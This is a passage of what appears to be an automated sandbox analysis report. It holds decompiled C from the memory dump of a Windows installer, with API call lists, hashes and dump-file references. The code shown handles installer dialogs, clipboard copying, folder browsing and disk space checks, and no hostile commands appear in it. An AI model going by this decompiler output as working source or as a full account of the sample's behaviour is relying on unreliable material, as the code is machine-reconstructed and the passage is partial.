                                                                                                                                                                                                              							_t95 = _a16;
                                                                                                                                                                                                              							__eflags = _a16 - 0xffffffff;
                                                                                                                                                                                                              							_t153 = _a16 >> 0x10;
                                                                                                                                                                                                              							if(_a16 == 0xffffffff) {
                                                                                                                                                                                                              								GetWindowRect(_v8,  &_v24);
                                                                                                                                                                                                              								_t95 = _v24.left;
                                                                                                                                                                                                              								_t153 = _v24.top;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                                                                                                                                              							__eflags = _t96 - 1;
                                                                                                                                                                                                              							if(_t96 == 1) {
                                                                                                                                                                                                              								_t165 = 1;
                                                                                                                                                                                                              								__eflags = 1;
                                                                                                                                                                                                              								_v56 = _t150;
                                                                                                                                                                                                              								_v44 = 0x420d50;
                                                                                                                                                                                                              								_v40 = 0x1000;
                                                                                                                                                                                                              								_a4 = _a12;
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									_a4 = _a4 - 1;
                                                                                                                                                                                                              									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                                                                                                                                              									__eflags = _a4 - _t150;
                                                                                                                                                                                                              									_t165 = _t165 + _t99 + 2;
                                                                                                                                                                                                              								} while (_a4 != _t150);
                                                                                                                                                                                                              								OpenClipboard(_t150);
                                                                                                                                                                                                              								EmptyClipboard();
                                                                                                                                                                                                              								_t102 = GlobalAlloc(0x42, _t165);
                                                                                                                                                                                                              								_a4 = _t102;
                                                                                                                                                                                                              								_t166 = GlobalLock(_t102);
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									_v44 = _t166;
                                                                                                                                                                                                              									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                                                                                                                                              									 *_t167 = 0xd;
                                                                                                                                                                                                              									_t168 = _t167 + 1;
                                                                                                                                                                                                              									 *_t168 = 0xa;
                                                                                                                                                                                                              									_t166 = _t168 + 1;
                                                                                                                                                                                                              									_t150 = _t150 + 1;
                                                                                                                                                                                                              									__eflags = _t150 - _a12;
                                                                                                                                                                                                              								} while (_t150 < _a12);
                                                                                                                                                                                                              								GlobalUnlock(_a4);
                                                                                                                                                                                                              								SetClipboardData(1, _a4);
                                                                                                                                                                                                              								CloseClipboard();
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags =  *0x423f0c - _t150; // 0x0
                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                              							ShowWindow( *0x424748, 8);
                                                                                                                                                                                                              							__eflags =  *0x4247ec - _t150;
                                                                                                                                                                                                              							if( *0x4247ec == _t150) {
                                                                                                                                                                                                              								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E00404285(1);
                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *0x420120 = 2;
                                                                                                                                                                                                              						E00404285(0x78);
                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eflags = _a12 - 0x403;
                                                                                                                                                                                                              						if(_a12 != 0x403) {
                                                                                                                                                                                                              							L20:
                                                                                                                                                                                                              							return E00404313(_t157, _a12, _a16);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						ShowWindow( *0x423f10, _t150);
                                                                                                                                                                                                              						ShowWindow(_v8, 8);
                                                                                                                                                                                                              						E004042E1(_v8);
                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_v48 = _v48 | 0xffffffff;
                                                                                                                                                                                                              				_v36 = _v36 | 0xffffffff;
                                                                                                                                                                                                              				_t169 = 2;
                                                                                                                                                                                                              				_v56 = _t169;
                                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                              				_t124 =  *0x424754;
                                                                                                                                                                                                              				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                                                                                                                                              				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                                                                                                                                              				 *0x423f10 = GetDlgItem(_a4, 0x403);
                                                                                                                                                                                                              				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
                                                                                                                                                                                                              				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                                                                                                                                              				 *0x423f24 = _t128;
                                                                                                                                                                                                              				_v8 = _t128;
                                                                                                                                                                                                              				E004042E1( *0x423f10);
                                                                                                                                                                                                              				 *0x423f14 = E00404BD2(4);
                                                                                                                                                                                                              				 *0x423f2c = 0;
                                                                                                                                                                                                              				GetClientRect(_v8,  &_v24);
                                                                                                                                                                                                              				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                                                                                                                                              				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                                                                                                                                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                                                                                                              				if(_a12 >= 0) {
                                                                                                                                                                                                              					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                                                                                                                                              					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_a8 >= _t150) {
                                                                                                                                                                                                              					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                                              				_push(0x1b);
                                                                                                                                                                                                              				E004042AC(_a4);
                                                                                                                                                                                                              				if(( *0x42475c & 0x00000003) != 0) {
                                                                                                                                                                                                              					ShowWindow( *0x423f10, _t150);
                                                                                                                                                                                                              					if(( *0x42475c & 0x00000002) != 0) {
                                                                                                                                                                                                              						 *0x423f10 = _t150;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						ShowWindow(_v8, 8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					E004042E1( *0x423f08);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                                                                              				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                                                                                                              				if(( *0x42475c & 0x00000004) != 0) {
                                                                                                                                                                                                              					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                                                                                                                              					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				goto L36;
                                                                                                                                                                                                              			}



































                                                                                                                                                                                                              0x00405493
                                                                                                                                                                                                              0x0040549b
                                                                                                                                                                                                              0x0040549e
                                                                                                                                                                                                              0x004054a6
                                                                                                                                                                                                              0x004054a9
                                                                                                                                                                                                              0x00405638
                                                                                                                                                                                                              0x0040563e
                                                                                                                                                                                                              0x00405662
                                                                                                                                                                                                              0x00405662
                                                                                                                                                                                                              0x0040566e
                                                                                                                                                                                                              0x00405674
                                                                                                                                                                                                              0x00405696
                                                                                                                                                                                                              0x00405696
                                                                                                                                                                                                              0x0040569c
                                                                                                                                                                                                              0x004056f1
                                                                                                                                                                                                              0x004056f1
                                                                                                                                                                                                              0x004056f4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004056f6
                                                                                                                                                                                                              0x004056f9
                                                                                                                                                                                                              0x004056fc
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405706
                                                                                                                                                                                                              0x0040570c
                                                                                                                                                                                                              0x0040570e
                                                                                                                                                                                                              0x00405711
                                                                                                                                                                                                              0x0040580e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040580e
                                                                                                                                                                                                              0x00405720
                                                                                                                                                                                                              0x0040572c
                                                                                                                                                                                                              0x00405735
                                                                                                                                                                                                              0x0040573c
                                                                                                                                                                                                              0x00405740
                                                                                                                                                                                                              0x00405743
                                                                                                                                                                                                              0x0040574c
                                                                                                                                                                                                              0x00405752
                                                                                                                                                                                                              0x00405755
                                                                                                                                                                                                              0x00405755
                                                                                                                                                                                                              0x00405765
                                                                                                                                                                                                              0x0040576b
                                                                                                                                                                                                              0x0040576e
                                                                                                                                                                                                              0x00405779
                                                                                                                                                                                                              0x00405779
                                                                                                                                                                                                              0x0040577a
                                                                                                                                                                                                              0x0040577d
                                                                                                                                                                                                              0x00405784
                                                                                                                                                                                                              0x0040578b
                                                                                                                                                                                                              0x00405793
                                                                                                                                                                                                              0x00405793
                                                                                                                                                                                                              0x004057a1
                                                                                                                                                                                                              0x004057a7
                                                                                                                                                                                                              0x004057aa
                                                                                                                                                                                                              0x004057aa
                                                                                                                                                                                                              0x004057b1
                                                                                                                                                                                                              0x004057b7
                                                                                                                                                                                                              0x004057c0
                                                                                                                                                                                                              0x004057c7
                                                                                                                                                                                                              0x004057d0
                                                                                                                                                                                                              0x004057d2
                                                                                                                                                                                                              0x004057d5
                                                                                                                                                                                                              0x004057e4
                                                                                                                                                                                                              0x004057e6
                                                                                                                                                                                                              0x004057e9
                                                                                                                                                                                                              0x004057ea
                                                                                                                                                                                                              0x004057ed
                                                                                                                                                                                                              0x004057ee
                                                                                                                                                                                                              0x004057ef
                                                                                                                                                                                                              0x004057ef
                                                                                                                                                                                                              0x004057f7
                                                                                                                                                                                                              0x00405802
                                                                                                                                                                                                              0x00405808
                                                                                                                                                                                                              0x00405808
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040576e
                                                                                                                                                                                                              0x0040569e
                                                                                                                                                                                                              0x004056a4
                                                                                                                                                                                                              0x004056d2
                                                                                                                                                                                                              0x004056d4
                                                                                                                                                                                                              0x004056da
                                                                                                                                                                                                              0x004056e5
                                                                                                                                                                                                              0x004056e5
                                                                                                                                                                                                              0x004056ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004056ec
                                                                                                                                                                                                              0x004056a8
                                                                                                                                                                                                              0x004056b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405676
                                                                                                                                                                                                              0x00405676
                                                                                                                                                                                                              0x0040567c
                                                                                                                                                                                                              0x004056b7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004056be
                                                                                                                                                                                                              0x00405685
                                                                                                                                                                                                              0x0040568c
                                                                                                                                                                                                              0x00405691
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405691
                                                                                                                                                                                                              0x00405674
                                                                                                                                                                                                              0x004054af
                                                                                                                                                                                                              0x004054b3
                                                                                                                                                                                                              0x004054bb
                                                                                                                                                                                                              0x004054bf
                                                                                                                                                                                                              0x004054c2
                                                                                                                                                                                                              0x004054c5
                                                                                                                                                                                                              0x004054c8
                                                                                                                                                                                                              0x004054cb
                                                                                                                                                                                                              0x004054cc
                                                                                                                                                                                                              0x004054cd
                                                                                                                                                                                                              0x004054e6
                                                                                                                                                                                                              0x004054e9
                                                                                                                                                                                                              0x004054f3
                                                                                                                                                                                                              0x00405502
                                                                                                                                                                                                              0x0040550a
                                                                                                                                                                                                              0x00405512
                                                                                                                                                                                                              0x00405517
                                                                                                                                                                                                              0x0040551a
                                                                                                                                                                                                              0x00405526
                                                                                                                                                                                                              0x0040552f
                                                                                                                                                                                                              0x00405538
                                                                                                                                                                                                              0x0040555a
                                                                                                                                                                                                              0x00405560
                                                                                                                                                                                                              0x00405571
                                                                                                                                                                                                              0x00405576
                                                                                                                                                                                                              0x00405584
                                                                                                                                                                                                              0x00405592
                                                                                                                                                                                                              0x00405592
                                                                                                                                                                                                              0x00405597
                                                                                                                                                                                                              0x004055a5
                                                                                                                                                                                                              0x004055a5
                                                                                                                                                                                                              0x004055aa
                                                                                                                                                                                                              0x004055ad
                                                                                                                                                                                                              0x004055b2
                                                                                                                                                                                                              0x004055be
                                                                                                                                                                                                              0x004055c7
                                                                                                                                                                                                              0x004055d4
                                                                                                                                                                                                              0x004055e3
                                                                                                                                                                                                              0x004055d6
                                                                                                                                                                                                              0x004055db
                                                                                                                                                                                                              0x004055db
                                                                                                                                                                                                              0x004055ef
                                                                                                                                                                                                              0x004055ef
                                                                                                                                                                                                              0x00405603
                                                                                                                                                                                                              0x0040560c
                                                                                                                                                                                                              0x00405615
                                                                                                                                                                                                              0x00405625
                                                                                                                                                                                                              0x00405631
                                                                                                                                                                                                              0x00405631
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004054EC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004054FB
                                                                                                                                                                                                              • GetClientRect.USER32 ref: 00405538
                                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 0040553F
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405560
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405571
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405584
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405592
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004055A5
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004055C7
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004055DB
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055FC
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 0040560C
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405625
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405631
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040550A
                                                                                                                                                                                                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040564D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405662
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405685
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040568C
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004056D2
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 00405706
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405717
                                                                                                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040572C
                                                                                                                                                                                                              • GetWindowRect.USER32 ref: 0040574C
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004057A1
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004057B1
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004057B7
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 004057CA
                                                                                                                                                                                                              • SendMessageA.USER32 ref: 004057DE
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                                                                                                                                                                                                              • SetClipboardData.USER32 ref: 00405802
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405808
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                              • String ID: PB
                                                                                                                                                                                                              • API String ID: 590372296-3196168531
                                                                                                                                                                                                              • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                                                                                                                                                                              • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                                              			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				long _v16;
                                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                              				long _v36;
                                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                                              				unsigned int _v44;
                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                              				CHAR* _v56;
                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                                                                              				CHAR* _v72;
                                                                                                                                                                                                              				void _v76;
                                                                                                                                                                                                              				struct HWND__* _v80;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                                                              				long _t87;
                                                                                                                                                                                                              				signed char* _t89;
                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                              				int _t109;
                                                                                                                                                                                                              				signed char _t114;
                                                                                                                                                                                                              				signed int _t118;
                                                                                                                                                                                                              				struct HWND__** _t122;
                                                                                                                                                                                                              				intOrPtr* _t138;
                                                                                                                                                                                                              				CHAR* _t146;
                                                                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                                                                              				unsigned int _t150;
                                                                                                                                                                                                              				signed int _t152;
                                                                                                                                                                                                              				unsigned int _t156;
                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                              				signed int* _t159;
                                                                                                                                                                                                              				signed char* _t160;
                                                                                                                                                                                                              				struct HWND__* _t165;
                                                                                                                                                                                                              				struct HWND__* _t166;
                                                                                                                                                                                                              				int _t168;
                                                                                                                                                                                                              				unsigned int _t197;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t156 = __edx;
                                                                                                                                                                                                              				_t82 =  *0x420528;
                                                                                                                                                                                                              				_v32 = _t82;
                                                                                                                                                                                                              				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                                                                                                                                                                                                              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                                                                                              				if(_a8 == 0x40b) {
                                                                                                                                                                                                              					E00405928(0x3fb, _t146);
                                                                                                                                                                                                              					E00406503(_t146);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t166 = _a4;
                                                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                                                                              						L20:
                                                                                                                                                                                                              						if(_a8 == 0x40f) {
                                                                                                                                                                                                              							L22:
                                                                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                              							E00405928(0x3fb, _t146);
                                                                                                                                                                                                              							if(E00405CAE(_t185, _t146) == 0) {
                                                                                                                                                                                                              								_v8 = 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E00406228(0x41fd20, _t146);
                                                                                                                                                                                                              							_t87 = E00406631(1);
                                                                                                                                                                                                              							_v16 = _t87;
                                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                              								E00406228(0x41fd20, _t146);
                                                                                                                                                                                                              								_t89 = E00405C59(0x41fd20);
                                                                                                                                                                                                              								_t158 = 0;
                                                                                                                                                                                                              								if(_t89 != 0) {
                                                                                                                                                                                                              									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_t168 = 0x400;
                                                                                                                                                                                                              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                                                                                              									asm("cdq");
                                                                                                                                                                                                              									_v48 = _t109;
                                                                                                                                                                                                              									_v44 = _t156;
                                                                                                                                                                                                              									_v12 = 1;
                                                                                                                                                                                                              									goto L36;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t159 = 0;
                                                                                                                                                                                                              								if(0 == 0x41fd20) {
                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L26;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									L26:
                                                                                                                                                                                                              									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
                                                                                                                                                                                                              									if(_t114 != 0) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									if(_t159 != 0) {
                                                                                                                                                                                                              										 *_t159 =  *_t159 & _t114;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t160 = E00405C07(0x41fd20);
                                                                                                                                                                                                              									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                                                                                              									_t159 = _t160 - 1;
                                                                                                                                                                                                              									 *_t159 = 0x5c;
                                                                                                                                                                                                              									if(_t159 != 0x41fd20) {
                                                                                                                                                                                                              										continue;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										goto L30;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t150 = _v44;
                                                                                                                                                                                                              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                                                                                              								_v44 = _t150 >> 0xa;
                                                                                                                                                                                                              								_v12 = 1;
                                                                                                                                                                                                              								_t158 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								L35:
                                                                                                                                                                                                              								_t168 = 0x400;
                                                                                                                                                                                                              								L36:
                                                                                                                                                                                                              								_t95 = E00404BD2(5);
                                                                                                                                                                                                              								if(_v12 != _t158) {
                                                                                                                                                                                                              									_t197 = _v44;
                                                                                                                                                                                                              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                                                                                              										_v8 = 2;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t147 =  *0x423f1c; // 0x2d134b
                                                                                                                                                                                                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                                                                                                              									E00404BBA(0x3ff, 0xfffffffb, _t95);
                                                                                                                                                                                                              									if(_v12 == _t158) {
                                                                                                                                                                                                              										SetDlgItemTextA(_a4, _t168, 0x41fd10);
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t96 = _v8;
                                                                                                                                                                                                              								 *0x424804 = _t96;
                                                                                                                                                                                                              								if(_t96 == _t158) {
                                                                                                                                                                                                              									_v8 = E0040140B(7);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                                                                                                              									_v8 = _t158;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								E004042CE(0 | _v8 == _t158);
                                                                                                                                                                                                              								if(_v8 == _t158 &&  *0x420d40 == _t158) {
                                                                                                                                                                                                              									E00404697();
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *0x420d40 = _t158;
                                                                                                                                                                                                              								goto L53;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t185 = _a8 - 0x405;
                                                                                                                                                                                                              						if(_a8 != 0x405) {
                                                                                                                                                                                                              							goto L53;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                                                              					if(_t118 != 0x3fb) {
                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                              						if(_t118 == 0x3e9) {
                                                                                                                                                                                                              							_t152 = 7;
                                                                                                                                                                                                              							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                                                              							_v80 = _t166;
                                                                                                                                                                                                              							_v72 = 0x420d50;
                                                                                                                                                                                                              							_v60 = E00404A8F;
                                                                                                                                                                                                              							_v56 = _t146;
                                                                                                                                                                                                              							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
                                                                                                                                                                                                              							_t122 =  &_v80;
                                                                                                                                                                                                              							_v64 = 0x41;
                                                                                                                                                                                                              							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                                                                                              							if(_t122 == 0) {
                                                                                                                                                                                                              								_a8 = 0x40f;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                                                              								E00405BC0(_t146);
                                                                                                                                                                                                              								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
                                                                                                                                                                                                              								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                                                                                                                                                                                                              									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
                                                                                                                                                                                                              									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
                                                                                                                                                                                                              										lstrcatA(_t146, 0x4236e0);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *0x420d40 =  *0x420d40 + 1;
                                                                                                                                                                                                              								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                                                              						goto L53;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_a8 = 0x40f;
                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                                                                                                              					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
                                                                                                                                                                                                              						E00405BC0(_t146);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *0x423f18 = _t166;
                                                                                                                                                                                                              					SetWindowTextA(_t165, _t146);
                                                                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                                                              					_push(1);
                                                                                                                                                                                                              					E004042AC(_t166);
                                                                                                                                                                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                                              					_push(0x14);
                                                                                                                                                                                                              					E004042AC(_t166);
                                                                                                                                                                                                              					E004042E1(_t165);
                                                                                                                                                                                                              					_t138 = E00406631(8);
                                                                                                                                                                                                              					if(_t138 == 0) {
                                                                                                                                                                                                              						L53:
                                                                                                                                                                                                              						return E00404313(_a8, _a12, _a16);
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *_t138(_t165, 1);
                                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}














































                                                                                                                                                                                                              0x0040473e
                                                                                                                                                                                                              0x00404744
                                                                                                                                                                                                              0x0040474a
                                                                                                                                                                                                              0x00404757
                                                                                                                                                                                                              0x00404765
                                                                                                                                                                                                              0x00404768
                                                                                                                                                                                                              0x00404770
                                                                                                                                                                                                              0x00404776
                                                                                                                                                                                                              0x00404776
                                                                                                                                                                                                              0x00404782
                                                                                                                                                                                                              0x00404785
                                                                                                                                                                                                              0x004047f3
                                                                                                                                                                                                              0x004047fa
                                                                                                                                                                                                              0x004048d1
                                                                                                                                                                                                              0x004048d8
                                                                                                                                                                                                              0x004048e7
                                                                                                                                                                                                              0x004048e7
                                                                                                                                                                                                              0x004048eb
                                                                                                                                                                                                              0x004048f5
                                                                                                                                                                                                              0x00404902
                                                                                                                                                                                                              0x00404904
